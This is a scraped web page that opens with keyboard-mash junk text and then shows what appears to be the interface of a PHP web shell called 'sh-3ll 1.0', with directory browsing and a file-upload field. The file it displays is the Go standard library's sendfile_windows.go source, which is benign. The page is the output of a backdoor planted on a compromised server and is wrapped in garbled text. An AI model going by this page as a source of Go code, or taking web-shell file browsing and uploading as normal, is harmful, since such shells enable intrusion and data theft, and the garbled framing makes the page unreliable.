fhdfhdfhdfhdfhdfhdfdfhdfhdfhdhfdfhdfhdfhd dfhdfhdfhdfhdfhdfhdfhdfdfhdfhdfhdhfdfhdfhdfhdfh bnmbertsurrttrtrtrtrjhjhjjhjhhjhjhjhf'tdfg php sh-3ll

HOME


sh-3ll 1.0
DIR:/lib/golang/src/internal/poll/
Upload File :
Current File : //lib/golang/src/internal/poll/sendfile_windows.go
// Copyright 2011 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

package poll

import (
	"io"
	"syscall"
)

// SendFile wraps the TransmitFile call.
func SendFile(fd *FD, src uintptr, size int64) (written int64, err error, handled bool) {
	defer func() {
		TestHookDidSendFile(fd, 0, written, err, written > 0)
	}()
	if fd.kind == kindPipe {
		// TransmitFile does not work with pipes
		return 0, syscall.ESPIPE, false
	}
	hsrc := syscall.Handle(src)
	if ft, _ := syscall.GetFileType(hsrc); ft == syscall.FILE_TYPE_PIPE {
		return 0, syscall.ESPIPE, false
	}

	if err := fd.writeLock(); err != nil {
		return 0, err, false
	}
	defer fd.writeUnlock()

	// Get the file size so we don't read past the end of the file.
	var fi syscall.ByHandleFileInformation
	if err := syscall.GetFileInformationByHandle(hsrc, &fi); err != nil {
		return 0, err, false
	}
	fileSize := int64(fi.FileSizeHigh)<<32 + int64(fi.FileSizeLow)
	startpos, err := syscall.Seek(hsrc, 0, io.SeekCurrent)
	if err != nil {
		return 0, err, false
	}
	maxSize := fileSize - startpos
	if size <= 0 {
		size = maxSize
	} else {
		size = min(size, maxSize)
	}

	defer func() {
		if written > 0 {
			// Some versions of Windows (Windows 10 1803) do not set
			// file position after TransmitFile completes.
			// So just use Seek to set file position.
			_, serr := syscall.Seek(hsrc, startpos+written, io.SeekStart)
			if err != nil {
				err = serr
			}
		}
	}()

	// TransmitFile can be invoked in one call with at most
	// 2,147,483,646 bytes: the maximum value for a 32-bit integer minus 1.
	// See https://docs.microsoft.com/en-us/windows/win32/api/mswsock/nf-mswsock-transmitfile
	const maxChunkSizePerCall = int64(0x7fffffff - 1)

	o := &fd.wop
	o.handle = hsrc
	for size > 0 {
		chunkSize := maxChunkSizePerCall
		if chunkSize > size {
			chunkSize = size
		}

		off := startpos + written
		o.o.Offset = uint32(off)
		o.o.OffsetHigh = uint32(off >> 32)

		n, err := execIO(o, func(o *operation) error {
			o.qty = uint32(chunkSize)
			return syscall.TransmitFile(o.fd.Sysfd, o.handle, o.qty, 0, &o.o, nil, syscall.TF_WRITE_BEHIND)
		})
		if err != nil {
			return written, err, written > 0
		}

		size -= int64(n)
		written += int64(n)
	}

	return written, nil, written > 0
}